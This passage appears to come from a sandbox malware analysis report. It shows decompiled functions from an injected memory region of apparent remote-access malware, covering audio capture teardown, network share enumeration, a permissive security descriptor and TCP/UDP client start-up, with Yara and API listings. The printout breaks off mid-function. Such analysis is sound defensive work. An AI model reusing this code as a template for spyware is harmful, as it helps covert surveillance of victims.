                                                                                    						SetSecurityDescriptorDacl(_v24, 1, _t48, 0);
                                                                                    						_t46 =  !=  ? 1 : 0;
                                                                                    					}
                                                                                    				}
                                                                                    				_t20 = _v20;
                                                                                    				if(_t20 != 0) {
                                                                                    					FreeSid(_t20);
                                                                                    				}
                                                                                    				if(_t46 != 0) {
                                                                                    					return E04ED572E(_v8 ^ _t49);
                                                                                    				} else {
                                                                                    					if(_t48 != 0) {
                                                                                    						HeapFree(GetProcessHeap(), _t46, _t48);
                                                                                    					}
                                                                                    					return E04ED572E(_v8 ^ _t49);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(04EBB5ED,00000001,74E5F560,74E06490), ref: 04EBAE7F
                                                                                    • AllocateAndInitializeSid.ADVAPI32(04EBB56F,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EBAE9B
                                                                                    • GetLengthSid.ADVAPI32(00000000,74E06620), ref: 04EBAEA9
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 04EBAEB5
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 04EBAEBC
                                                                                    • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 04EBAECC
                                                                                    • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,00000000), ref: 04EBAEE1
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04EBAEF2
                                                                                    • FreeSid.ADVAPI32(00000000), ref: 04EBAF0B
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04EBAF1B
                                                                                    • HeapFree.KERNEL32(00000000), ref: 04EBAF22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$Initialize$DescriptorFreeProcessSecurity$AccessAllocAllocateAllowedDaclLength
                                                                                    • String ID: ft
                                                                                    • API String ID: 1313825231-3858869227
                                                                                    • Opcode ID: a336b49abe5b1383db2307eaa75e9120ec288ebead4a93737e176b2aa25d0342
                                                                                    • Instruction ID: 3ec324321a346daae7fbb629fcf630ad6f140b399c27e97e7aad5f8f4154a5b6
                                                                                    • Opcode Fuzzy Hash: a336b49abe5b1383db2307eaa75e9120ec288ebead4a93737e176b2aa25d0342
                                                                                    • Instruction Fuzzy Hash: 1C312F71A01219ABDB20DFA69C49FEFBBBCEF84746F00412ABD05D2144DB749D00C7A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E04EB1280(intOrPtr* __ecx) {
                                                                                    				void* _t38;
                                                                                    				void* _t39;
                                                                                    				void* _t40;
                                                                                    				intOrPtr* _t42;
                                                                                    				intOrPtr* _t43;
                                                                                    				struct wavehdr_tag** _t45;
                                                                                    				struct wavehdr_tag** _t46;
                                                                                    				void* _t47;
                                                                                    
                                                                                    				_t42 = __ecx;
                                                                                    				 *__ecx = 0x4efb5cc; // vtable pointer: destructor of a waveIn/waveOut wrapper object
                                                                                    				if( *((char*)(__ecx + 0x44)) != 0) { // flag at +0x44: capture device is open
                                                                                    					waveInStop( *(__ecx + 0x18));
                                                                                    					waveInReset( *(__ecx + 0x18));
                                                                                    					_t46 = __ecx + 0x30;
                                                                                    					_t40 = 2;
                                                                                    					do {
                                                                                    						// two WAVEHDR pointers at +0x30; 0x20 is sizeof(WAVEHDR) on 32-bit
                                                                                    						waveInUnprepareHeader( *(__ecx + 0x18),  *_t46, 0x20);
                                                                                    						_t46 =  &(_t46[1]);
                                                                                    						_t40 = _t40 - 1;
                                                                                    					} while (_t40 != 0);
                                                                                    					waveInClose( *(__ecx + 0x18));
                                                                                    					TerminateThread( *(__ecx + 0x2c), 0xffffffff);
                                                                                    				}
                                                                                    				if( *((char*)(_t42 + 0x45)) != 0) {
                                                                                    					waveOutReset( *(_t42 + 0x40));
                                                                                    					_t45 = _t42 + 0x30;
                                                                                    					_t39 = 2;
                                                                                    					do {
                                                                                    						waveOutUnprepareHeader( *(_t42 + 0x40),  *_t45, 0x20);
                                                                                    						_t45 =  &(_t45[1]);
                                                                                    						_t39 = _t39 - 1;
                                                                                    					} while (_t39 != 0);
                                                                                    					waveOutClose( *(_t42 + 0x40));
                                                                                    				}
                                                                                    				_t43 = _t42 + 0x30;
                                                                                    				_t38 = 2;
                                                                                    				do {
                                                                                    					E04ED573F( *((intOrPtr*)(_t43 - 0x28)));
                                                                                    					_push(0x20);
                                                                                    					E04ED5777( *_t43);
                                                                                    					E04ED573F( *((intOrPtr*)(_t43 - 0x20)));
                                                                                    					_push(0x20);
                                                                                    					E04ED5777( *((intOrPtr*)(_t43 + 8)));
                                                                                    					_t47 = _t47 + 0x18;
                                                                                    					_t43 = _t43 + 4;
                                                                                    					_t38 = _t38 - 1;
                                                                                    				} while (_t38 != 0);
                                                                                    				CloseHandle( *(_t42 + 0x24));
                                                                                    				CloseHandle( *(_t42 + 0x28));
                                                                                    				return CloseHandle( *(_t42 + 0x2c));
                                                                                    			}

                                                                                    APIs
                                                                                    • waveInStop.WINMM(?), ref: 04EB1294
                                                                                    • waveInReset.WINMM(?), ref: 04EB129D
                                                                                    • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 04EB12B7
                                                                                    • waveInClose.WINMM(?), ref: 04EB12C8
                                                                                    • TerminateThread.KERNEL32(?,000000FF), ref: 04EB12D3
                                                                                    • waveOutReset.WINMM(?), ref: 04EB12E2
                                                                                    • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 04EB12F7
                                                                                    • waveOutClose.WINMM(?), ref: 04EB1308
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB134D
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB1352
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB1357
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wave$Close$Handle$HeaderResetUnprepare$StopTerminateThread
                                                                                    • String ID: 0et
                                                                                    • API String ID: 1104916709-2725761952
                                                                                    • Opcode ID: 0ff11c5e38e063bddc7761ad418632b35cd44cf04dfd2e32dd7f938d3cd0178b
                                                                                    • Instruction ID: a435e4697241379cd3533709f8b51ece9fb9fabcf0c08b09fbd2ce482d063d26
                                                                                    • Opcode Fuzzy Hash: 0ff11c5e38e063bddc7761ad418632b35cd44cf04dfd2e32dd7f938d3cd0178b
                                                                                    • Instruction Fuzzy Hash: 46211671900612BFEB215F21DD08A59BF72FF48365F100124EA45629A5CB26B866DFC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB47A0() {
                                                                                    				void* _v8;
                                                                                    				int _v12;
                                                                                    				void* _v16;
                                                                                    				int _v20;
                                                                                    				int _v24;
                                                                                    				void* _v28;
                                                                                    				void* _t35;
                                                                                    				int _t38;
                                                                                    				int _t45;
                                                                                    				signed int* _t48;
                                                                                    				signed int _t49;
                                                                                    				int _t51;
                                                                                    				long _t57;
                                                                                    				signed int _t59;
                                                                                    				WCHAR* _t60;
                                                                                    				void* _t62;
                                                                                    				WCHAR** _t66;
                                                                                    				void* _t70;
                                                                                    
                                                                                    				_v20 = 0x4000;
                                                                                    				_t57 = 0;
                                                                                    				_v12 = 0xffffffff;
                                                                                    				_v16 = 0;
                                                                                    				if(WNetOpenEnumW(1, 1, 0, 0,  &_v16) == 0) {
                                                                                    					_v8 = LocalAlloc(0x40, 0x400);
                                                                                    					_t35 = LocalAlloc(0x40, _v20);
                                                                                    					_t62 = _t35;
                                                                                    					_v28 = _t62;
                                                                                    					if(_t62 != 0) {
                                                                                    						_t70 = _v8;
                                                                                    						while(1) {
                                                                                    							_t38 = WNetEnumResourceW(_v16,  &_v12, _t62,  &_v20);
                                                                                    							if(_t38 != 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_v24 = _t38;
                                                                                    							if(_v12 > _t38) {
                                                                                    								_t66 = _t62 + 0x14;
                                                                                    								do {
                                                                                    									_t45 = lstrlenW( *_t66);
                                                                                    									if(_t57 + (_t45 + 1) * 2 <= LocalSize(_v8)) {
                                                                                    										_t70 = _v8;
                                                                                    									} else {
                                                                                    										_t70 = LocalReAlloc(_v8, _t57 + (lstrlenW( *_t66) + 1) * 2, 0x42);
                                                                                    										_v8 = _t70;
                                                                                    									}
                                                                                    									_t60 =  *_t66;
                                                                                    									_t48 = _t70 + _t57;
                                                                                    									do {
                                                                                    										_t59 =  *_t60 & 0x0000ffff;
                                                                                    										_t60 =  &(_t60[1]);
                                                                                    										 *_t48 = _t59;
                                                                                    										_t48 =  &(_t48[0]);
                                                                                    									} while (_t59 != 0);
                                                                                    									_t49 = lstrlenW( *_t66);
                                                                                    									_t66 =  &(_t66[8]);
                                                                                    									_t51 = _v24 + 1;
                                                                                    									_t57 = _t57 + _t49 * 2 + 2;
                                                                                    									_v24 = _t51;
                                                                                    								} while (_t51 < _v12);
                                                                                    								_t62 = _v28;
                                                                                    							}
                                                                                    						}
                                                                                    						LocalFree(_t62);
                                                                                    						WNetCloseEnum(_v16);
                                                                                    						if(_t70 == 0) {
                                                                                    							L19:
                                                                                    							return _t70;
                                                                                    						} else {
                                                                                    							if(_t57 >= 1) {
                                                                                    								_t70 = LocalReAlloc(_t70, _t57, 0x42);
                                                                                    								goto L19;
                                                                                    							} else {
                                                                                    								LocalFree(_t70);
                                                                                    								return 0;
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						return _t35;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 04EB47C4
                                                                                    • LocalAlloc.KERNEL32(00000040,00000400,74E069A0,?), ref: 04EB47E4
                                                                                    • LocalAlloc.KERNEL32(00000040,00004000), ref: 04EB47EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocLocal$EnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2229625058-0
                                                                                    • Opcode ID: 06757e93395d85a8e44bb83b4ad9d315b08804bfb1a9245822cd199434bd760e
                                                                                    • Instruction ID: ca81ef2310de6f6fb489bd7f6b5bd58c65f9cce5d1028a926b1a4296a5b880bd
                                                                                    • Opcode Fuzzy Hash: 06757e93395d85a8e44bb83b4ad9d315b08804bfb1a9245822cd199434bd760e
                                                                                    • Instruction Fuzzy Hash: B441AE72A01119ABCB11DFA9E884AEEFBB8FF84715F1101A6F954E3255DB316E108B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EEB98F(intOrPtr _a4) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _t25;
                                                                                    				intOrPtr* _t26;
                                                                                    				intOrPtr _t28;
                                                                                    				intOrPtr* _t29;
                                                                                    				intOrPtr* _t31;
                                                                                    				intOrPtr* _t45;
                                                                                    				intOrPtr* _t46;
                                                                                    				intOrPtr* _t47;
                                                                                    				intOrPtr* _t55;
                                                                                    				intOrPtr* _t70;
                                                                                    				intOrPtr _t74;
                                                                                    
                                                                                    				_t74 = _a4;
                                                                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                    				if(_t25 != 0 && _t25 != 0x4f036f0) {
                                                                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                    							E04EE8159(_t46);
                                                                                    							E04EEBCA3( *((intOrPtr*)(_t74 + 0x88)));
                                                                                    						}
                                                                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                    							E04EE8159(_t47);
                                                                                    							E04EEBDA1( *((intOrPtr*)(_t74 + 0x88)));
                                                                                    						}
                                                                                    						E04EE8159( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                    						E04EE8159( *((intOrPtr*)(_t74 + 0x88)));
                                                                                    					}
                                                                                    				}
                                                                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                    					E04EE8159( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                    					E04EE8159( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                    					E04EE8159( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                    					E04EE8159( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                    				}
                                                                                    				E04EEBB02( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                    				_t28 = 6;
                                                                                    				_t16 = _t74 + 0xa0; // 0xa1
                                                                                    				_t55 = _t16;
                                                                                    				_v8 = _t28;
                                                                                    				_t18 = _t74 + 0x28; // 0x29
                                                                                    				_t70 = _t18;
                                                                                    				do {
                                                                                    					if( *((intOrPtr*)(_t70 - 8)) != 0x4f03100) {
                                                                                    						_t31 =  *_t70;
                                                                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                    							E04EE8159(_t31);
                                                                                    							E04EE8159( *_t55);
                                                                                    						}
                                                                                    						_t28 = _v8;
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                    							E04EE8159(_t29);
                                                                                    						}
                                                                                    						_t28 = _v8;
                                                                                    					}
                                                                                    					_t55 = _t55 + 4;
                                                                                    					_t70 = _t70 + 0x10;
                                                                                    					_t28 = _t28 - 1;
                                                                                    					_v8 = _t28;
                                                                                    				} while (_t28 != 0);
                                                                                    				return E04EE8159(_t74);
                                                                                    			}

                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 04EEB9D3
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCC0
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCD2
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCE4
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBCF6
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD08
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD1A
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD2C
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD3E
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD50
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD62
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD74
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD86
                                                                                      • Part of subcall function 04EEBCA3: _free.LIBCMT ref: 04EEBD98
                                                                                    • _free.LIBCMT ref: 04EEB9C8
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EEB9EA
                                                                                    • _free.LIBCMT ref: 04EEB9FF
                                                                                    • _free.LIBCMT ref: 04EEBA0A
                                                                                    • _free.LIBCMT ref: 04EEBA2C
                                                                                    • _free.LIBCMT ref: 04EEBA3F
                                                                                    • _free.LIBCMT ref: 04EEBA4D
                                                                                    • _free.LIBCMT ref: 04EEBA58
                                                                                    • _free.LIBCMT ref: 04EEBA90
                                                                                    • _free.LIBCMT ref: 04EEBA97
                                                                                    • _free.LIBCMT ref: 04EEBAB4
                                                                                    • _free.LIBCMT ref: 04EEBACC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: ecf9d5313286dd3b29d302e8cd7eee91687f425a9406bc1b68bfefe1708175ef
                                                                                    • Instruction ID: e884d6ca3f32f912369a5ef0ab41edadb4378b6ade07c6c2e6d26d34b8023baf
                                                                                    • Opcode Fuzzy Hash: ecf9d5313286dd3b29d302e8cd7eee91687f425a9406bc1b68bfefe1708175ef
                                                                                    • Instruction Fuzzy Hash: A93139716006059EEB21EB7BE844B7673E9FB00318F10692AE49DE7290DF32F9809761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 75%
                                                                                    			E04ECE920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                    				signed int _v8;
                                                                                    				char _v36;
                                                                                    				char _v64;
                                                                                    				long _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				signed int _t47;
                                                                                    				long _t60;
                                                                                    				long _t61;
                                                                                    				signed int _t69;
                                                                                    				intOrPtr _t76;
                                                                                    				intOrPtr _t82;
                                                                                    				intOrPtr* _t105;
                                                                                    				signed int _t109;
                                                                                    
                                                                                    				_t47 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t47 ^ _t109;
                                                                                    				_t82 = _a4;
                                                                                    				_t105 = __ecx;
                                                                                    				_v72 = _a16;
                                                                                    				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                                                    					L16:
                                                                                    					__eflags = _v8 ^ _t109;
                                                                                    					return E04ED572E(_v8 ^ _t109);
                                                                                    				} else {
                                                                                    					E04ECE8D0(__ecx + 0x148);
                                                                                    					_t113 =  *(__ecx + 0x50) - 3;
                                                                                    					if( *(__ecx + 0x50) != 3) {
                                                                                    						 *(__ecx + 0x48) = 1;
                                                                                    						SetLastError(0x139f);
                                                                                    						 *(_t105 + 0x148) = 0;
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						 *(__ecx + 0x50) = 0;
                                                                                    						 *(__ecx + 0x148) = 0;
                                                                                    						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                                                    						 *(__ecx + 0xc) = 1;
                                                                                    						_v36 = 0;
                                                                                    						_v64 = 0;
                                                                                    						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                                                    						 *(__ecx + 0x14) = 0;
                                                                                    						 *(__ecx + 0x18) = 1;
                                                                                    						_v68 = 0;
                                                                                    						_t60 = E04ECEB90(_t82, __ecx, __ecx, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                                                    						if(_t60 == 0) {
                                                                                    							__imp__#111();
                                                                                    							 *(__ecx + 0x48) = 3;
                                                                                    							goto L13;
                                                                                    						} else {
                                                                                    							_t60 = E04ECD7B0(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                                                    							if(_t60 == 0) {
                                                                                    								__imp__#111();
                                                                                    								 *(__ecx + 0x48) = 4;
                                                                                    								L13:
                                                                                    								SetLastError(_t60);
                                                                                    								goto L14;
                                                                                    							} else {
                                                                                    								SetLastError(0);
                                                                                    								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                                                    								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                                                    									_t69 = GetLastError();
                                                                                    									__eflags = _t69;
                                                                                    									_t70 =  ==  ? 0x4c7 : _t69;
                                                                                    									E04ECE7F0(_t105, 5, "CTcpClient::Start",  ==  ? 0x4c7 : _t69);
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									_t98 = _t105;
                                                                                    									if(E04ECECF0( &_v36, _t105,  &_v36, _a12) == 0) {
                                                                                    										__imp__#111();
                                                                                    										E04ECE7F0(_t105, 0xb, "CTcpClient::Start", _t73);
                                                                                    										goto L14;
                                                                                    									} else {
                                                                                    										_t76 = E04EDF4C7(_t98, 0, 0, E04ECEDD0, _t105, 0, _t105 + 0x44);
                                                                                    										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                                                    										if(_t76 == 0) {
                                                                                    											E04ECE7F0(_t105, 8, "CTcpClient::Start", 0x65f);
                                                                                    											L14:
                                                                                    											 *(_t105 + 0xc) = 0;
                                                                                    											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                                                    											 *(_t105 + 0x14) = 0;
                                                                                    											 *(_t105 + 0x18) = 1;
                                                                                    											_t61 = GetLastError();
                                                                                    											 *((intOrPtr*)( *_t105 + 4))();
                                                                                    											SetLastError(_t61);
                                                                                    											__eflags = _v8 ^ _t109;
                                                                                    											return E04ED572E(_v8 ^ _t109);
                                                                                    										} else {
                                                                                    											_v68 = 1;
                                                                                    											ResetEvent( *(_t105 + 4));
                                                                                    											return E04ED572E(_v8 ^ _t109);
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ECEB17
                                                                                      • Part of subcall function 04ECEB90: WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECEC16
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 04ECE9F1
                                                                                    • GetLastError.KERNEL32 ref: 04ECEA89
                                                                                      • Part of subcall function 04ECECF0: WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECED04
                                                                                      • Part of subcall function 04ECECF0: connect.WS2_32(?,?,00000010), ref: 04ECED2C
                                                                                      • Part of subcall function 04ECECF0: WSAGetLastError.WS2_32 ref: 04ECED3F
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ECEA41
                                                                                    • WSAGetLastError.WS2_32(?,00000005), ref: 04ECEA72
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 04ECEAA6
                                                                                    • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 04ECEAB5
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECEAC9
                                                                                    • GetLastError.KERNEL32 ref: 04ECEAE7
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECEAF3
                                                                                      • Part of subcall function 04ECD7B0: htons.WS2_32(?), ref: 04ECD81E
                                                                                      • Part of subcall function 04ECD7B0: bind.WS2_32(?,00000002,0000001C), ref: 04ECD842
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                    • String ID: CTcpClient::Start
                                                                                    • API String ID: 4138520258-3740072585
                                                                                    • Opcode ID: 885b2bc53596b21f276e4d66e1245c497c8f24576a19407a7398dbf995171200
                                                                                    • Instruction ID: ee9f2f63779d73044f407f74bce8c923f23fd3418c8354a7d0bc5995fb4496f6
                                                                                    • Opcode Fuzzy Hash: 885b2bc53596b21f276e4d66e1245c497c8f24576a19407a7398dbf995171200
                                                                                    • Instruction Fuzzy Hash: 6451B170700609EFEB14DFA9D948BAEB7B9FF88305F00511AE905D7290DB76B855CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 71%
                                                                                    			E04ECD3D0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                    				// Decompiler output for the function whose error strings name it CUdpClient::Start.
                                                                                    				// __ecx is the object (this); _a4.._a20 are the Start() parameters. The comments are editorial:
                                                                                    				// constant names are the standard Win32/Winsock values for the literals, and __imp__#111 is
                                                                                    				// WS2_32 ordinal 111 (WSAGetLastError), which the API list below confirms at refs 04ECD522,
                                                                                    				// 04ECD556 and 04ECD565. Readings of the vtable slots and of the state field are inferred.
                                                                                    				signed int _v8;            // copy of the stack cookie
                                                                                    				char _v36;                 // local endpoint buffer (filled by the bind helper)
                                                                                    				char _v64;                 // remote endpoint buffer (filled by the address-resolve helper)
                                                                                    				long _v68;                 // set to 1 only on the success path
                                                                                    				intOrPtr _v72;
                                                                                    				void* __ebp;
                                                                                    				signed int _t47;
                                                                                    				long _t60;
                                                                                    				long _t61;
                                                                                    				signed int _t69;
                                                                                    				signed int _t70;
                                                                                    				signed int _t73;
                                                                                    				intOrPtr _t76;
                                                                                    				intOrPtr _t82;
                                                                                    				intOrPtr* _t98;
                                                                                    				intOrPtr* _t105;
                                                                                    				signed int _t109;
                                                                                    				intOrPtr _t113;
                                                                                    
                                                                                    				_t47 =  *0x4f03008; // 0x3d21fb31 (security cookie)
                                                                                    				_v8 = _t47 ^ _t109;
                                                                                    				_t82 = _a4;
                                                                                    				_t105 = __ecx;
                                                                                    				_v72 = _a16;
                                                                                    				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {          // virtual call at vtable+0xb0 (parameter check); zero aborts the start
                                                                                    					L16:
                                                                                    					__eflags = _v8 ^ _t109;
                                                                                    					return E04ED572E(_v8 ^ _t109);                     // cookie check and return
                                                                                    				} else {
                                                                                    					E04ECE8D0(__ecx + 0x148);                           // acquire spin lock at +0x148 (InterlockedCompareExchange/SwitchToThread loop, see APIs)
                                                                                    					_t113 =  *(__ecx + 0x50) - 3;
                                                                                    					if( *(__ecx + 0x50) != 3) {                         // state field at +0x50 must be 3 (read: stopped) before Start
                                                                                    						 *(__ecx + 0x48) = 1;                            // error category 1: illegal state
                                                                                    						SetLastError(0x139f);                           // ERROR_INVALID_STATE (5023)
                                                                                    						 *(_t105 + 0x148) = 0;                           // release lock
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						 *(__ecx + 0x50) = 0;                            // state 0 (read: starting)
                                                                                    						 *(__ecx + 0x148) = 0;                           // release lock
                                                                                    						 *((intOrPtr*)( *__ecx + 0xb4))();               // virtual call at vtable+0xb4 (pre-start setup)
                                                                                    						 *(__ecx + 0xc) = 1;
                                                                                    						_v36 = 0;
                                                                                    						_v64 = 0;
                                                                                    						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                                                    						 *(__ecx + 0x14) = 0;
                                                                                    						 *(__ecx + 0x18) = 1;
                                                                                    						_v68 = 0;
                                                                                    						// Resolve the remote address and create the UDP socket. On a bad address the helper
                                                                                    						// calls WSASetLastError(0x273f) = WSAEINVAL (10022) and returns 0.
                                                                                    						_t60 = E04ECD670(_t82, __ecx, __ecx, __esi, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                                                    						if(_t60 == 0) {
                                                                                    							_t60 = __imp__#111();                       // WSAGetLastError()
                                                                                    							 *(__ecx + 0x48) = 3;                        // error category 3: socket create failed
                                                                                    							goto L13;
                                                                                    						} else {
                                                                                    							// Bind the local endpoint (htons + bind inside the helper).
                                                                                    							_t60 = E04ECD7B0(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                                                    							if(_t60 == 0) {
                                                                                    								_t60 = __imp__#111();                   // WSAGetLastError()
                                                                                    								 *(__ecx + 0x48) = 4;                    // error category 4: bind failed
                                                                                    								L13:
                                                                                    								SetLastError(_t60);
                                                                                    								goto L14;
                                                                                    							} else {
                                                                                    								SetLastError(0);
                                                                                    								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                                                    								// Virtual "prepare connect" handler at vtable+0x78; a return value of 2 cancels the start.
                                                                                    								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                                                    									_t69 = GetLastError();
                                                                                    									_t70 = (_t69 == 0) ? 0x4c7 : _t69;    // default to ERROR_CANCELLED (1223) when the handler set no error
                                                                                    									E04ECE7F0(_t105, 5, "CUdpClient::Start", _t70);   // record error category 5 with source string and code
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									_push(_a12);
                                                                                    									_t98 = _t105;
                                                                                    									// WSAEventSelect(FD_CONNECT|FD_CLOSE) and connect() on the datagram socket (inside the helper);
                                                                                    									// a connected UDP socket lets the worker receive only from the configured peer.
                                                                                    									if(E04ECD8E0( &_v36, SetLastError, _t105, _t105,  &_v36) == 0) {
                                                                                    										_t73 = __imp__#111();           // WSAGetLastError()
                                                                                    										E04ECE7F0(_t105, 0xb, "CUdpClient::Start", _t73);   // error category 11: connect failed
                                                                                    										goto L14;
                                                                                    									} else {
                                                                                    										// Start the worker thread at M04ECDA10 with this as argument (argument pattern matches
